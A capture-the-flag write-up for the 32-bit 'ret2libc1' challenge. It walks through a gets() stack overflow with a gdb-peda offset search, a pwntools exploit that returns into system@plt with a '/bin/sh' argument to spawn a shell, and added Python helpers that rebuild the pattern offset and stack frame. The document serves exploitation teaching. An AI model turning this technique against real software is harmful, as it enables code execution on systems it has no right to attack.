ret2libc1

Challenge link: ret2libc1

1. Basic information

File information

r2lbc1.png

Protections

r2lbc2.png

IDA disassembly

r2lbc3.png

2. Locating the vulnerability and exploit analysis

IDA shows that the call to gets() is a stack overflow: it reads an unbounded line into a fixed-size stack buffer. Because NX (non-executable stack) is enabled, ret2shellcode is not an option. The binary does, however, import the system() function, so we can return into it instead.

ret2libc

ret2libc means redirecting execution into a function that lives in libc, usually by returning to that function's PLT stub or to the function itself (i.e. the address stored in its GOT entry). Normally the goal is to execute system("/bin/sh"), so we need the address of system. Here the binary imports system itself and is loaded at a fixed base (the 0x0804xxxx addresses below), so system@plt is a constant and no libc leak is needed. On 32-bit x86 the argument is passed on the stack: it goes right after the slot that will serve as system's own return address.

Approach

1. Find "/bin/sh"

First we need the address of the "/bin/sh" string.

Two ways to find it:

1.

r2lbc4.jpg

2.

5.png

binsh_addr = 0x08048720

2. Find the address of system in the PLT

r2lbc5.png

sys_plt = 0x08048460

3. Compute the overflow offset

gdb-peda$ pattern create 150
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /home/hc/study/pwn/stackoverflow/ret2libc/ret2libc1/ret2libc1
RET2LIBC >_<
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb45c0 --> 0xfbad2288
EDX: 0xf7fb589c --> 0x0
ESI: 0xf7fb4000 --> 0x1d4d6c
EDI: 0x0
EBP: 0x6941414d ('MAAi')
ESP: 0xffffce80 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EIP: 0x41384141 ('AA8A')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41384141
[------------------------------------stack-------------------------------------]
0000| 0xffffce80 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
0004| 0xffffce84 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
0008| 0xffffce88 ("AAOAAkAAPAAlAAQAAmAARAAoAA")
0012| 0xffffce8c ("AkAAPAAlAAQAAmAARAAoAA")
0016| 0xffffce90 ("PAAlAAQAAmAARAAoAA")
0020| 0xffffce94 ("AAQAAmAARAAoAA")
0024| 0xffffce98 ("AmAARAAoAA")
0028| 0xffffce9c ("RAAoAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41384141 in ?? ()
gdb-peda$ pattern offset AA8A
AA8A found at offset: 112
gdb-peda$ pattern search
Registers contain pattern buffer:
EBP+0 found at offset: 108
EIP+0 found at offset: 112
Registers point to pattern buffer:
[ESP] --> offset 116 - size ~34
Pattern buffer found at:
0x0804b160 : offset 0 - size 150 ([heap])
0xffffce0c : offset 0 - size 150 ($sp + -0x74 [-29 dwords])
References to pattern buffer found at:
0xf7fb45cc : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d0 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d4 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d8 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45dc : 0x0804b160 (/lib32/libc-2.27.so)
0xffffcc84 : 0x0804b160 ($sp + -0x1fc [-127 dwords])
0xffffcd54 : 0x0804b160 ($sp + -0x12c [-75 dwords])
0xffffcdcc : 0xffffce0c ($sp + -0xb4 [-45 dwords])
0xffffcdf0 : 0xffffce0c ($sp + -0x90 [-36 dwords])

So the offset from the start of the buffer to the saved return address (EIP) is 112; the saved EBP sits at offset 108, four bytes before it. Note that EIP shows 0x41384141 while the pattern chunk is "AA8A": the register holds the bytes little-endian, which is why `pattern offset AA8A` is searched as a string rather than as the hex value.
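The offset recovery that gdb-peda performs with `pattern create` / `pattern offset`, as an added example that is not part of the original writeup. It reuses the 150-byte pattern and the crash register values from the session above, and also generates a unique-window (de Bruijn) pattern of the kind pwntools' cyclic() produces; the function names are my own.

```python
# Added example, not part of the original writeup: recover the overflow
# offset from a crash the way gdb-peda's `pattern offset` does, and
# generate a unique-window pattern the way pwntools' cyclic() does.
import struct
from itertools import islice

# The 150-byte pattern gdb-peda produced in the session above (copied
# from the writeup). Register values at the crash came from the same
# session: EIP = 0x41384141, EBP = 0x6941414d.
PEDA_PATTERN = b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA"


def pattern_offset(pattern, reg_value, bits=32):
    """Offset of reg_value inside pattern, or None if it is not there.
    The register holds the overwritten bytes little-endian: EIP =
    0x41384141 means the bytes b'AA8A' (0x41 0x41 0x38 0x41) were
    popped, so pack the value the same way before searching."""
    needle = struct.pack("<I" if bits == 32 else "<Q", reg_value)
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def de_bruijn_pattern(length, alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Pattern in which every n-byte window is unique (pwntools' cyclic()
    uses this construction), so one crash value maps to one offset.
    Assumption: length <= len(alphabet) ** n; beyond that windows repeat."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        # standard recursive de Bruijn generator, yielded lazily so we
        # only compute as many bytes as requested
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    yield alphabet[c]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return bytes(islice(db(1, 1), length))


def crash_offsets(pattern, eip, ebp):
    """What `pattern search` summarised: offsets of the saved EIP and
    saved EBP slots relative to the start of the overflowed buffer."""
    return {"eip": pattern_offset(pattern, eip),
            "ebp": pattern_offset(pattern, ebp)}


if __name__ == "__main__":
    print(crash_offsets(PEDA_PATTERN, 0x41384141, 0x6941414d))  # {'eip': 112, 'ebp': 108}
    pat = de_bruijn_pattern(150)
    print(pat[:20])                        # b'aaaabaaacaaadaaaeaaa'
    print(pattern_offset(pat, 0x62616161))  # 1  (EIP bytes b'aaab')
```

If `pattern_offset` returns None, the register was not overwritten by the pattern at all (it may hold a pointer into it instead, like ESP in the session above), which is why peda reports those separately under "Registers point to pattern buffer".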

3. Write the exploit

from pwn import *

p = process('./ret2libc1')
sys_plt_addr = 0x08048460   # system@plt
binsh_addr = 0x08048720     # "/bin/sh" inside the binary
# 112 bytes of padding reach the saved EIP. Then: system@plt (popped
# into EIP by ret), a fake return address for system, and system's
# first argument, read from the stack per the 32-bit cdecl convention.
payload = b'A' * 112 + p32(sys_plt_addr) + p32(0xdeadbeef) + p32(binsh_addr)
p.recv()            # consume the "RET2LIBC >_<" banner
p.sendline(payload)
p.interactive()

r2lbc6.png
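The frame the exploit above builds, worked through as an added example that is not part of the original writeup. It replaces pwntools' p32 with plain struct so it runs offline, reuses the three addresses from the writeup, and checks two things the one-line payload relies on: the 32-bit cdecl layout after `ret` (and what goes wrong when the fake return slot is forgotten) and the fact that gets() stops at a newline. The address 0x0804080a used to trigger that check is hypothetical; the function names are my own.

```python
# Added example, not part of the original writeup: build the ret2libc
# frame with plain struct (no pwntools needed) and check the two things
# the one-line payload above silently relies on: the 32-bit cdecl stack
# layout after `ret`, and the fact that gets() stops at a newline.
import struct

SYSTEM_PLT = 0x08048460   # system@plt, from the writeup
BINSH_ADDR = 0x08048720   # "/bin/sh" inside the binary, from the writeup
OFFSET = 112              # buffer start -> saved EIP, from the writeup


def p32(v):
    """Little-endian 32-bit pack, same as pwntools' p32."""
    return struct.pack("<I", v)


def ret2func32(offset, func, args, fake_ret=0xdeadbeef, filler=b"A"):
    """32-bit ret2libc / ret2plt frame.
    After the overflowed function executes `ret`, `func` is popped into
    EIP and ESP points just past it, so the callee finds what looks like
    its own return address at [ESP] and its arguments at [ESP+4], ...
    exactly as if it had been reached through a normal CALL."""
    frame = filler * offset + p32(func) + p32(fake_ret)
    for a in args:
        frame += p32(a)
    return frame


def simulate_ret(payload, offset):
    """Interpret the overflowed frame as the CPU will: the dword at
    `offset` becomes EIP; the next is the callee's return address; the
    rest are its stack arguments. Returns (eip, ret_addr, args)."""
    tail = payload[offset:]
    n = len(tail) // 4
    if n < 2:
        raise ValueError("frame too short: need at least EIP and a return slot")
    dwords = list(struct.unpack("<%dI" % n, tail[:4 * n]))
    return dwords[0], dwords[1], dwords[2:]


def gets_truncation_points(payload):
    """gets() reads up to the first '\\n' (0x0a), so any such byte inside
    an address truncates the payload there. NUL bytes are fine: gets()
    does not stop on them (strcpy()/strcat() would)."""
    return [i for i, b in enumerate(payload) if b == 0x0a]


if __name__ == "__main__":
    good = ret2func32(OFFSET, SYSTEM_PLT, [BINSH_ADDR])
    print(simulate_ret(good, OFFSET))    # (0x8048460, 0xdeadbeef, [0x8048720])
    # Classic mistake: leaving out the fake return slot shifts "/bin/sh"
    # into the return-address position, so system() gets no argument.
    bad = b"A" * OFFSET + p32(SYSTEM_PLT) + p32(BINSH_ADDR)
    print(simulate_ret(bad, OFFSET))     # (0x8048460, 0x8048720, [])
    print(gets_truncation_points(good))  # []
    # Hypothetical address whose low byte is 0x0a: gets() would cut the
    # payload right at the EIP slot.
    print(gets_truncation_points(ret2func32(OFFSET, 0x0804080a, [BINSH_ADDR])))  # [112]
```

The 0xdeadbeef slot is never used until system() returns, at which point the process crashes; that is harmless here because the shell is already running, but for a clean exit or for chaining a second call the slot would hold exit@plt or the next function instead.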
